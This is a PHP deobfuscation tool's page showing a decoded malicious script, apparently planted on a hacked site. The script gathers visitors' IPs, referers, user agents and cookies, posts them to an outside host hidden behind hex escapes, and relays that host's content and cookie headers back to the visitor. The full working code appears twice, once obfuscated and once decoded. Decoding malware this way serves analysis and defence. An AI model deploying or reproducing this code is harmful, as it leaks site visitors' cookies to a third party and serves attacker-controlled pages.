Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $z=&$_SERVER; $req=substr($z['REQUEST_URI'], 7); $a=explode('|',"HTTP_X_FORWARD..

Decoded Output download

 
<?php 
$z=&$_SERVER; 
$req=substr($z['REQUEST_URI'], 7); 
$a=explode('|',"HTTP_X_FORWARDED_FOR|HTTP_FORWARDED_FOR|HTTP_X_REAL_IP|REMOTE_ADDR|HTTP_REFERER|HTTP_USER_AGENT|http://essaysfast.org/coldwellbankersmart_com|http://coldwellbankersmart.com/keygen"); 
if(isset($z[$a[0]])){if(strpos($z[$a[0]],',')!==false){$r=explode(',',$z[$a[0]]);$ip=trim($r[count($r)-2]);}else $ip=$z[$a[0]];}elseif(isset($z[$a[1]]))$ip=$z[$a[1]];elseif(isset($z[$a[2]]))$ip=$z[$a[2]];else$ip=@$z[$a[3]]; 
$po='&baby='.urlencode($a[7]).'&ip='.$ip; 
$co='';if(!empty($_COOKIE)){foreach($_COOKIE as $cn=>$cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}} 
if(is_callable('curl_init')) { 
$ch=curl_init();$v='curl_setopt'; 
$v($ch,10002,$a[6].$req);$v($ch,10015,$po);$v($ch,19913,1);$v($ch,10016,@$z[$a[4]]);$v($ch,10018,$z[$a[5]]);$v($ch,20079,'hf'); 
if($co)$v($ch,10022, $co); 
echo curl_exec($ch); 
}else{ 
$m=parse_url($a[6].$req); 
$f=fsockopen($m['host'],80) or die(); 
$h="POST {$m['path']} HTTP/1.1
Host: {$m['host']}
Content-Type: application/x-www-form-urlencoded
"; 
if(!empty($z[$a[4]]))$h.="Referer: {$z[$a[4]]}
"; 
if($co)$h.="Cookie: $co
"; 
$h.="User-agent: {$z[$a[5]]}
Content-length: ".strlen($po)."
Connection: Close

"; 
fwrite($f,$h.$po);$r='';while(!feof($f)){$r.=fgets($f,1024);}fclose($f); 
list($h,$d)=explode("

",$r,2);$h=explode("
",$h); 
foreach($h as $l){hf(0,$l);if(strpos($l,'chunked')!==false)$c=true;} 
if(@$c){for($o='';!empty($d);$d=trim($d)){$s=strpos($d,"
");$e=hexdec(substr($d,0,$s));$o.=substr($d,$s+2,$e);$d=substr($d,$s+2+$e);}echo $o;}else echo $d; 
} 
function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);} 
 ?>

Did this file decode correctly?

Original Code


<?php
$z=&$_SERVER;
$req=substr($z['REQUEST_URI'], 7);
$a=explode('|',"HTTP_X_FORWARDED_FOR|HTTP_FORWARDED_FOR|HTTP_X_REAL_IP|REMOTE_ADDR|HTTP_REFERER|HTTP_USER_AGENT|\x68\x74\x74\160\72\x2f\57\x65\163\x73\x61\171\163\x66\141\x73\x74\x2e\x6f\x72\147\x2f\x63\157\x6c\144\x77\x65\154\x6c\x62\141\156\x6b\145\x72\163\155\x61\x72\x74\137\x63\x6f\x6d|\x68\x74\x74\160\x3a\57\57\x63\157\x6c\x64\x77\145\154\x6c\142\x61\156\x6b\x65\x72\163\155\x61\162\164\x2e\x63\157\x6d\x2f\153\145\x79\x67\x65\x6e");
if(isset($z[$a[0]])){if(strpos($z[$a[0]],',')!==false){$r=explode(',',$z[$a[0]]);$ip=trim($r[count($r)-2]);}else $ip=$z[$a[0]];}elseif(isset($z[$a[1]]))$ip=$z[$a[1]];elseif(isset($z[$a[2]]))$ip=$z[$a[2]];else$ip=@$z[$a[3]];
$po='&baby='.urlencode($a[7]).'&ip='.$ip;
$co='';if(!empty($_COOKIE)){foreach($_COOKIE as $cn=>$cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}}
if(is_callable('curl_init')) {
$ch=curl_init();$v='curl_setopt';
$v($ch,10002,$a[6].$req);$v($ch,10015,$po);$v($ch,19913,1);$v($ch,10016,@$z[$a[4]]);$v($ch,10018,$z[$a[5]]);$v($ch,20079,'hf');
if($co)$v($ch,10022, $co);
echo curl_exec($ch);
}else{
$m=parse_url($a[6].$req);
$f=fsockopen($m['host'],80) or die();
$h="POST {$m['path']} HTTP/1.1\r\nHost: {$m['host']}\r\nContent-Type: application/x-www-form-urlencoded\r\n";
if(!empty($z[$a[4]]))$h.="Referer: {$z[$a[4]]}\r\n";
if($co)$h.="Cookie: $co\r\n";
$h.="User-agent: {$z[$a[5]]}\r\nContent-length: ".strlen($po)."\r\nConnection: Close\r\n\r\n";
fwrite($f,$h.$po);$r='';while(!feof($f)){$r.=fgets($f,1024);}fclose($f);
list($h,$d)=explode("\r\n\r\n",$r,2);$h=explode("\r\n",$h);
foreach($h as $l){hf(0,$l);if(strpos($l,'chunked')!==false)$c=true;}
if(@$c){for($o='';!empty($d);$d=trim($d)){$s=strpos($d,"\r\n");$e=hexdec(substr($d,0,$s));$o.=substr($d,$s+2,$e);$d=substr($d,$s+2+$e);}echo $o;}else echo $d;
}
function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);}

Function Calls

count 1
strpos 1
substr 1
explode 2

Variables

$a [{'key': None, 'value': 'HTTP_X_FORWARDED_FOR'}, {'key': None, 'value': 'HTTP_FORWARDED_FOR'}, {'key': None, 'value': 'HTTP_X_REAL_IP'}, {'key': None, 'value': 'REMOTE_ADDR'}, {'key': None, 'value': 'HTTP_REFERER'}, {'key': None, 'value': 'HTTP_USER_AGENT'}, {'key': None, 'value': 'http://essaysfast.org/coldwellbankersmart_com'}, {'key': None, 'value': 'http://coldwellbankersmart.com/keygen'}]
$r None
$z 0
$req

Stats

MD5 b5fdef4b423acfab6fdaf11adc82ace3
Eval Count 0
Decode Time 164 ms